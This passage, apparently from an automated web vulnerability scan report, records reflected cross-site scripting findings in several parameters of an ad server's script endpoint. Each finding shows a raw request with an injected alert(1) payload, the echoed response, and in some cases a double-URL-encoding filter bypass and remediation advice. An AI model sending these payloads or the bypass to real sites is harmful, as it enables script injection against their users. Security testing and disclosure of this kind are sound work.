Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2; fp=599362::7:IN:::1296392421:1:33; u=4d2cdd9abba1d; i_1=33:1411:972:100:0:34115:1296392427:B2|33:1391:835:95:0:34115:1296392421:B2|33:353:516:3:0:34115:1296392207:B2

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sun, 30 Jan 2011 14:50:17 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1681

   function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash"].enabledPlugin){
               return (navigator.plugins["Shockwave Flash 2.0"] || navigator.plugins["Shockwave Flash"]).descr
...[SNIP]...
d7fd7c0fb6e6a631357/1411.0.js.120x60/1296399017**;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'?click=http://g.redacted/_2AD0003L/97000000000044962.1?!&&PID=8015235&UIT=G&TargetID=8231208&AN=17989824732f424"-alert(1)-"73f0b6789de&PG=INV4QD&ASID=c0c03864f93b446ea43c1039d6665980">
...[SNIP]...

5.89. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1798982473 [ASID parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.wsod.com
Path:	/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1798982473

Issue detail

The value of the ASID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 45b7f"-alert(1)-"150a6e34d9c was submitted in the ASID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1798982473?click=http://g.redacted/_2AD0003L/97000000000044962.1?!&&PID=8015235&UIT=G&TargetID=8231208&AN=1798982473&PG=INV4QD&ASID=c0c03864f93b446ea43c1039d666598045b7f"-alert(1)-"150a6e34d9c HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://moneycentral.msn.com/investor/charts/chartdl.aspx?symbol=indu22b72%22;alert(1)//2badde9cef5
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2; fp=599362::7:IN:::1296392421:1:33; u=4d2cdd9abba1d; i_1=33:1411:972:100:0:34115:1296392427:B2|33:1391:835:95:0:34115:1296392421:B2|33:353:516:3:0:34115:1296392207:B2

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sun, 30 Jan 2011 14:50:35 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1681

   function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash"].enabledPlugin){
               return (navigator.plugins["Shockwave Flash 2.0"] || navigator.plugins["Shockwave Flash"]).descr
...[SNIP]...
*;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'?click=http://g.redacted/_2AD0003L/97000000000044962.1?!&&PID=8015235&UIT=G&TargetID=8231208&AN=1798982473&PG=INV4QD&ASID=c0c03864f93b446ea43c1039d666598045b7f"-alert(1)-"150a6e34d9c">
...[SNIP]...

5.90. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1798982473 [PG parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.wsod.com
Path:	/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1798982473

Issue detail

The value of the PG request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 28a9b"-alert(1)-"18d2c882ce5 was submitted in the PG parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1798982473?click=http://g.redacted/_2AD0003L/97000000000044962.1?!&&PID=8015235&UIT=G&TargetID=8231208&AN=1798982473&PG=INV4QD28a9b"-alert(1)-"18d2c882ce5&ASID=c0c03864f93b446ea43c1039d6665980 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://moneycentral.msn.com/investor/charts/chartdl.aspx?symbol=indu22b72%22;alert(1)//2badde9cef5
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2; fp=599362::7:IN:::1296392421:1:33; u=4d2cdd9abba1d; i_1=33:1411:972:100:0:34115:1296392427:B2|33:1391:835:95:0:34115:1296392421:B2|33:353:516:3:0:34115:1296392207:B2

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sun, 30 Jan 2011 14:50:25 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1681

   function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash"].enabledPlugin){
               return (navigator.plugins["Shockwave Flash 2.0"] || navigator.plugins["Shockwave Flash"]).descr
...[SNIP]...
e6a631357/1411.0.js.120x60/1296399025**;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'?click=http://g.redacted/_2AD0003L/97000000000044962.1?!&&PID=8015235&UIT=G&TargetID=8231208&AN=1798982473&PG=INV4QD28a9b"-alert(1)-"18d2c882ce5&ASID=c0c03864f93b446ea43c1039d6665980">
...[SNIP]...

5.91. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1798982473 [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.wsod.com
Path:	/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1798982473

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f5282%2522%253balert%25281%2529%252f%252f3ec5efad5b4 was submitted in the REST URL parameter 2. This input was echoed as f5282";alert(1)//3ec5efad5b4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357f5282%2522%253balert%25281%2529%252f%252f3ec5efad5b4/1411.0.js.120x60/1798982473?click=http://g.redacted/_2AD0003L/97000000000044962.1?!&&PID=8015235&UIT=G&TargetID=8231208&AN=1798982473&PG=INV4QD&ASID=c0c03864f93b446ea43c1039d6665980 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://moneycentral.msn.com/investor/charts/chartdl.aspx?symbol=indu22b72%22;alert(1)//2badde9cef5
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2; fp=599362::7:IN:::1296392421:1:33; u=4d2cdd9abba1d; i_1=33:1411:972:100:0:34115:1296392427:B2|33:1391:835:95:0:34115:1296392421:B2|33:353:516:3:0:34115:1296392207:B2

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sun, 30 Jan 2011 14:51:27 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1681

   function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash"].enabledPlugin){
               return (navigator.plugins["Shockwave Flash 2.0"] || navigator.plugins["Shockwave Flash"]).descr
...[SNIP]...
<scr'+'ipt type="text/javascr'+'ipt" src="'+wsod.proto+'//ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357f5282";alert(1)//3ec5efad5b4/1411.0.js.120x60/1296399087**;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'?click=http://g.redacted/_2AD0003L/97000000000044962.1?!&&PID=8015235&UIT=G&TargetID=8231208&AN=1798982473&PG=INV4QD&ASID=c0c
...[SNIP]...

5.92. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1798982473 [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.wsod.com
Path:	/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1798982473

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload db472%2522%253balert%25281%2529%252f%252fcf9a3b974a6 was submitted in the REST URL parameter 3. This input was echoed as db472";alert(1)//cf9a3b974a6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60db472%2522%253balert%25281%2529%252f%252fcf9a3b974a6/1798982473?click=http://g.redacted/_2AD0003L/97000000000044962.1?!&&PID=8015235&UIT=G&TargetID=8231208&AN=1798982473&PG=INV4QD&ASID=c0c03864f93b446ea43c1039d6665980 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://moneycentral.msn.com/investor/charts/chartdl.aspx?symbol=indu22b72%22;alert(1)//2badde9cef5
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2; fp=599362::7:IN:::1296392421:1:33; u=4d2cdd9abba1d; i_1=33:1411:972:100:0:34115:1296392427:B2|33:1391:835:95:0:34115:1296392421:B2|33:353:516:3:0:34115:1296392207:B2

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sun, 30 Jan 2011 14:51:33 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1681

   function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash"].enabledPlugin){
               return (navigator.plugins["Shockwave Flash 2.0"] || navigator.plugins["Shockwave Flash"]).descr
...[SNIP]...
<scr'+'ipt type="text/javascr'+'ipt" src="'+wsod.proto+'//ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60db472";alert(1)//cf9a3b974a6/1296399093**;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'?click=http://g.redacted/_2AD0003L/97000000000044962.1?!&&PID=8015235&UIT=G&TargetID=8231208&AN=1798982473&PG=INV4QD&ASID=c0c03864f93b446ea43c
...[SNIP]...

5.93. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1798982473 [TargetID parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.wsod.com
Path:	/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1798982473

Issue detail

The value of the TargetID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cda5b"-alert(1)-"73a9c13756 was submitted in the TargetID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1798982473?click=http://g.redacted/_2AD0003L/97000000000044962.1?!&&PID=8015235&UIT=G&TargetID=8231208cda5b"-alert(1)-"73a9c13756&AN=1798982473&PG=INV4QD&ASID=c0c03864f93b446ea43c1039d6665980 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://moneycentral.msn.com/investor/charts/chartdl.aspx?symbol=indu22b72%22;alert(1)//2badde9cef5
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2; fp=599362::7:IN:::1296392421:1:33; u=4d2cdd9abba1d; i_1=33:1411:972:100:0:34115:1296392427:B2|33:1391:835:95:0:34115:1296392421:B2|33:353:516:3:0:34115:1296392207:B2

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sun, 30 Jan 2011 14:50:02 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1680

   function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash"].enabledPlugin){
               return (navigator.plugins["Shockwave Flash 2.0"] || navigator.plugins["Shockwave Flash"]).descr
...[SNIP]...
/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1296399002**;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'?click=http://g.redacted/_2AD0003L/97000000000044962.1?!&&PID=8015235&UIT=G&TargetID=8231208cda5b"-alert(1)-"73a9c13756&AN=1798982473&PG=INV4QD&ASID=c0c03864f93b446ea43c1039d6665980">
...[SNIP]...

5.94. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1798982473 [UIT parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.wsod.com
Path:	/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1798982473

Issue detail

The value of the UIT request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2e406"-alert(1)-"7d0f2844801 was submitted in the UIT parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1798982473?click=http://g.redacted/_2AD0003L/97000000000044962.1?!&&PID=8015235&UIT=G2e406"-alert(1)-"7d0f2844801&TargetID=8231208&AN=1798982473&PG=INV4QD&ASID=c0c03864f93b446ea43c1039d6665980 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://moneycentral.msn.com/investor/charts/chartdl.aspx?symbol=indu22b72%22;alert(1)//2badde9cef5
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2; fp=599362::7:IN:::1296392421:1:33; u=4d2cdd9abba1d; i_1=33:1411:972:100:0:34115:1296392427:B2|33:1391:835:95:0:34115:1296392421:B2|33:353:516:3:0:34115:1296392207:B2

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sun, 30 Jan 2011 14:49:43 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1681

   function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash"].enabledPlugin){
               return (navigator.plugins["Shockwave Flash 2.0"] || navigator.plugins["Shockwave Flash"]).descr
...[SNIP]...
ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1296398983**;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'?click=http://g.redacted/_2AD0003L/97000000000044962.1?!&&PID=8015235&UIT=G2e406"-alert(1)-"7d0f2844801&TargetID=8231208&AN=1798982473&PG=INV4QD&ASID=c0c03864f93b446ea43c1039d6665980">
...[SNIP]...

5.95. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1798982473 [click parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.wsod.com
Path:	/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1798982473

Issue detail

The value of the click request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 974be"-alert(1)-"a93d2815993 was submitted in the click parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1798982473?click=http://g.redacted/_2AD0003L/97000000000044962.1?!974be"-alert(1)-"a93d2815993&&PID=8015235&UIT=G&TargetID=8231208&AN=1798982473&PG=INV4QD&ASID=c0c03864f93b446ea43c1039d6665980 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://moneycentral.msn.com/investor/charts/chartdl.aspx?symbol=indu22b72%22;alert(1)//2badde9cef5
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2; fp=599362::7:IN:::1296392421:1:33; u=4d2cdd9abba1d; i_1=33:1411:972:100:0:34115:1296392427:B2|33:1391:835:95:0:34115:1296392421:B2|33:353:516:3:0:34115:1296392207:B2

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sun, 30 Jan 2011 14:49:06 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1681

   function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash"].enabledPlugin){
               return (navigator.plugins["Shockwave Flash 2.0"] || navigator.plugins["Shockwave Flash"]).descr
...[SNIP]...
c="'+wsod.proto+'//ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1296398946**;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'?click=http://g.redacted/_2AD0003L/97000000000044962.1?!974be"-alert(1)-"a93d2815993&&PID=8015235&UIT=G&TargetID=8231208&AN=1798982473&PG=INV4QD&ASID=c0c03864f93b446ea43c1039d6665980">
...[SNIP]...

5.96. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1798982473 [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.wsod.com
Path:	/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1798982473

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload da298"-alert(1)-"52d4453bbd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1798982473?click=http://g.redacted/_2AD0003L/97000000000044962.1?!&&PID=8015235&UIT=G&TargetID=8231208&AN=1798982473&PG=INV4QD&ASID=c0c03864f93b446ea43c1039d6665980&da298"-alert(1)-"52d4453bbd=1 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://moneycentral.msn.com/investor/charts/chartdl.aspx?symbol=indu22b72%22;alert(1)//2badde9cef5
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2; fp=599362::7:IN:::1296392421:1:33; u=4d2cdd9abba1d; i_1=33:1411:972:100:0:34115:1296392427:B2|33:1391:835:95:0:34115:1296392421:B2|33:353:516:3:0:34115:1296392207:B2

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sun, 30 Jan 2011 14:51:11 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1683

   function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash"].enabledPlugin){
               return (navigator.plugins["Shockwave Flash 2.0"] || navigator.plugins["Shockwave Flash"]).descr
...[SNIP]...
;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'?click=http://g.redacted/_2AD0003L/97000000000044962.1?!&&PID=8015235&UIT=G&TargetID=8231208&AN=1798982473&PG=INV4QD&ASID=c0c03864f93b446ea43c1039d6665980&da298"-alert(1)-"52d4453bbd=1">
...[SNIP]...

5.97. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296350847** [&PID parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.wsod.com
Path:	/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296350847**

Issue detail

The value of the &PID request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 46172'-alert(1)-'e1abf17b2d0 was submitted in the &PID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296350847**;10,1,103;1920;1200;http%3A_@2F_@2Fmoney.redacted_@2Finvesting_@3F4755d%2522%253E%253Cscript%253Ealert1%253C_@2Fscript%253E10ee24922f0%3D1?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=801063946172'-alert(1)-'e1abf17b2d0&UIT=G&TargetID=28253488&AN=993020147&PG=INVSRQ&ASID=b7e3b00f832b4ae1873eac83f051400a HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:47:27:7:0:32725:1294844800:B2; u=4d2cdd9abba1d; i_1=46:572:479:0:0:37754:1295635392:L|33:971:560:0:0:33209:1295378828:B2|33:971:560:0:0:37102:1294942822:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sun, 30 Jan 2011 01:40:09 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: u=4d2cdd9abba1d; expires=Wed, 02-Mar-2011 01:40:09 GMT; path=/
Set-Cookie: i_1=33:353:198:3:0:34115:1296351609:B2|46:572:479:0:0:37754:1295635392:L|33:971:560:0:0:33209:1295378828:B2; expires=Tue, 01-Mar-2011 01:40:09 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 875

   function wsodOOBClick() {
       var i = new Image();
       i.src = 'http://g.redacted/_2AD0003L/93000000000038010.1?!&&PID=801063946172'-alert(1)-'e1abf17b2d0&UIT=G&TargetID=28253488&AN=993020147&PG=INVSRQ&ASID=b7e3b00f832b4ae1873eac83f051400a';
       var iRM = new Image();
       iRM.src = 'http://redcated/action/Scottrade_Remessaging';
       return true;
   }
       fu
...[SNIP]...

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.wsod.com
Path:	/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296350847**

Issue detail

The value of the 10,1,103;1920;1200;http%3A_@2F_@2Fmoney.redacted_@2Finvesting_@3F4755d%2522%253E%253Cscript%253Ealert1%253C_@2Fscript%253E10ee24922f0%3D1?click request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 25bb1'-alert(1)-'42f2cbb6b9e was submitted in the 10,1,103;1920;1200;http%3A_@2F_@2Fmoney.redacted_@2Finvesting_@3F4755d%2522%253E%253Cscript%253Ealert1%253C_@2Fscript%253E10ee24922f0%3D1?click parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296350847**;10,1,103;1920;1200;http%3A_@2F_@2Fmoney.redacted_@2Finvesting_@3F4755d%2522%253E%253Cscript%253Ealert1%253C_@2Fscript%253E10ee24922f0%3D1?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!25bb1'-alert(1)-'42f2cbb6b9e&&PID=8010639&UIT=G&TargetID=28253488&AN=993020147&PG=INVSRQ&ASID=b7e3b00f832b4ae1873eac83f051400a HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:47:27:7:0:32725:1294844800:B2; u=4d2cdd9abba1d; i_1=46:572:479:0:0:37754:1295635392:L|33:971:560:0:0:33209:1295378828:B2|33:971:560:0:0:37102:1294942822:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sun, 30 Jan 2011 01:40:00 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: u=4d2cdd9abba1d; expires=Wed, 02-Mar-2011 01:40:00 GMT; path=/
